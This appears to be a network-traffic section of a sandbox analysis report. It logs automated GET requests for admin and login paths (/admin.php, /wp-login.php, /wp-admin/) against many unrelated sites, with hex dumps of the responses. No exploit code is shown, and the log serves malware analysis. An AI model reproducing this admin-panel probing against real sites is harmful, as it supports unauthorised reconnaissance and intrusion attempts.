                                                                                                                                                                                                                                                                                                                                                                set-cookie: reg_ver2=3; expires=Tue, 04-Feb-2025 11:16:10 GMT; Max-Age=31536000; path=/; domain=.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-ded7546-web23
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5bfd2c7bca-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC611INData Raw: 31 61 65 39 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 20 68 72 65 66 3d 22 2f 2f 69 2e 62 63 69 63 64 6e 2e 63 6f 6d 2f 63 73 73 2d 6d 69 6e 2f 34 74 73 35 37 2f 65 78 74 72 61 2f 64 65 70 72 65 63 61 74 65 64 5f 73 74 75 62 2e 63 73 73 22 20 64 61 74 61 2d 65 78 74 72 61 3d 22 31 22 20 2f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 6f 22 20 64 61 74 61 2d 63 73 72 66 5f 66 69 65 6c 64 3d 22 5f 63 73 72 66 5f 74 6f 6b 65 6e 22 20 64 61 74 61 2d 63 73 72 66 5f 76 61 6c 75 65 3d 22 65 63 32 64 63 38 38 64 31 37 61 30 34 61 36 32 65 37 65 34 37 38 63 38 31 32 38 34 62 61 66 34 22 3e 0a 3c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ae9<link rel="stylesheet" type="text/css" media="screen" href="//i.bcicdn.com/css-min/4ts57/extra/deprecated_stub.css" data-extra="1" /><!DOCTYPE html><html lang="ro" data-csrf_field="_csrf_token" data-csrf_value="ec2dc88d17a04a62e7e478c81284baf4"><
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 6d 64 42 62 65 4e 47 46 6f 76 33 65 56 35 4b 77 33 54 76 45 4f 50 2d 66 43 32 62 41 31 32 4f 61 4e 45 7a 39 2d 63 33 71 7a 51 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 43 72 65 65 61 7a 61 2d 74 69 20 63 6f 6e 74 75 6c 20 67 72 61 74 75 69 74 20 31 30 30 25 2e 31 30 30 2b 20 6d 6f 64 65 6c 65 20 64 69 73 70 6f 6e 69 62 69 6c 65 20 70 65 6e 74 72 75 20 73 65 78 20 6c 69 76 65 20 70 65 20 63 61 6d 65 72 65 20 77 65 62 2e 20 41 6c 61 74 75 72 61 2d 74 65 20 63 65 6c 65 69 20 6d 61 69 20 6d 61 72 69 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ephone=no" /><meta name="google-site-verification" content="jmdBbeNGFov3eV5Kw3TvEOP-fC2bA12OaNEz9-c3qzQ" /><meta name="description" content="Creeaza-ti contul gratuit 100%.100+ modele disponibile pentru sex live pe camere web. Alatura-te celei mai mari
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 65 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 74 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 6c 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 67 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 62 67 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 76 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 6c 76 22 20 2f 3e 0a 3c 6c 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: in" hreflang="et" /><link rel="alternate" href="https://lt.bongacams.com/admin" hreflang="lt" /><link rel="alternate" href="https://bg.bongacams.com/admin" hreflang="bg" /><link rel="alternate" href="https://lv.bongacams.com/admin" hreflang="lv" /><li
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 66 72 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 69 74 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65 66 6c 61 6e 67 3d 22 64 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6a 70 2e 62 6f 6e 67 61 63 61 6d 73 2e 63 6f 6d 2f 61 64 6d 69 6e 22 20 68 72 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: bongacams.com/admin" hreflang="fr" /><link rel="alternate" href="https://it.bongacams.com/admin" hreflang="it" /><link rel="alternate" href="https://de.bongacams.com/admin" hreflang="de" /><link rel="alternate" href="https://jp.bongacams.com/admin" hre
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 32 33 31 32 32 35 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 61 30 32 32 33 39 22 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 52 34 4c 4e 44 44 39 59 4a 33 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 0a 20 20 20 20 64 61 74 61 4c 61 79 65 72 2e 70 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 231225"> <meta name="theme-color" content="#a02239"><script async src="https://www.googletagmanager.com/gtag/js?id=G-R4LNDD9YJ3"></script><script type="text/javascript"> window.dataLayer = window.dataLayer || []; function gtag() { dataLayer.pu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC810INData Raw: 20 20 20 20 44 6f 77 6e 6c 6f 61 64 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 74 65 6d 20 5f 5f 6f 70 65 72 61 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 6f 70 65 72 61 2e 63 6f 6d 2f 64 6f 77 6e 6c 6f 61 64 2f 22 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 62 73 5f 6c 5f 69 6d 67 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Download </div> </div> <div class="dbs_l_item __opera"> <a href="//www.opera.com/download/" class="dbs_l_link" target="_blank" rel="nofollow noopener"></a> <div class="dbs_l_img"></div> <div
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                132192.168.2.663497138.197.59.199443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC182OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC585INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: JSP/2.2
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: JSESSIONID=w0MJPTHCHLZiEcNbGbud2a8h.cmrsanmartin; path=/
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Robots-Tag: noindex,noarchive
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-CL
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC554INData Raw: 32 31 65 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 3e 3c 2f 6c 69 6e 6b 3e 0d 0a 09 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 2d 20 4c 61 20 70 c3 a1 67 69 6e 61 20 6e 6f 20 65 78 69 73 74 65 3c 2f 74 69 74 6c 65 3e 09 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 21e<!DOCTYPE html><html lang="es" class="login"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="shortcut icon" href="/favicon.ico" ></link><title>Error - La pgina no existe</title><link type="te


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                133192.168.2.6646083.161.150.69443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC181OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC2028INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64g
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=efa84f3d83ca000a&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgcLIf0TMqzdZ8YCpErSRx-VJ_NHvJY3I5Gv8mJys8gdUXLaeE-pi64g; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-G7uy4pm4OGXJyfV' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 cc32f91d3d591d364f0c4e44eaf6525e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: uFTx0EgRNNejU_cEiOeYjjvxbjwDYmshtbmPo_p877ZYL7_CKRSNgg==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC16384INData Raw: 35 35 62 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5568INData Raw: 72 79 5f 63 6f 64 65 22 3a 22 73 73 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 32 31 31 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 32 33 39 22 2c 22 6e 61 6d 65 22 3a 22 53 5c 75 30 30 65 33 6f 20 54 6f 6d 5c 75 30 30 65 39 20 61 6e 64 20 50 72 5c 75 30 30 65 64 6e 63 69 70 65 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 74 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 35 30 33 22 2c 22 6e 61 6d 65 22 3a 22 45 6c 20 53 61 6c 76 61 64 6f 72 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 76 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 53 74 2e 20 4d 61 61 72 74 65 6e 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 73 78 22 2c 22 70 72 65 66 69 78 22 3a 22 2b 31 20 37 32 31 22 7d 2c 7b 22 70 72 65 66 69 78 22 3a 22 2b 39 36 33 22 2c 22 63 6f
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ry_code":"ss","prefix":"+211"},{"prefix":"+239","name":"S\u00e3o Tom\u00e9 and Pr\u00edncipe","country_code":"st"},{"prefix":"+503","name":"El Salvador","country_code":"sv"},{"name":"St. Maarten","country_code":"sx","prefix":"+1 721"},{"prefix":"+963","co
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                134192.168.2.6631883.161.136.2443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC179OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC699INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 64
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/en/wp-admin/
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: 11da1a8ec2944ef89177eca886e85da3
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 0.00
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 571e3220ab398deac626300fc9ad3bb0.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: RFNQj2JANRgzMcISWC6ARI9M3fvb9wh-9VYMNbWxEo5-tHnUV4B4aQ==
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC64INData Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 6f 75 6e 74 73 2e 62 69 6e 61 6e 63 65 2e 63 6f 6d 2f 65 6e 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://accounts.binance.com/en/wp-admin/">Found</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                135192.168.2.66347734.149.46.130443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5747INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=b740351c-8fe3-4e92-abf0-9c45e891561b; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com 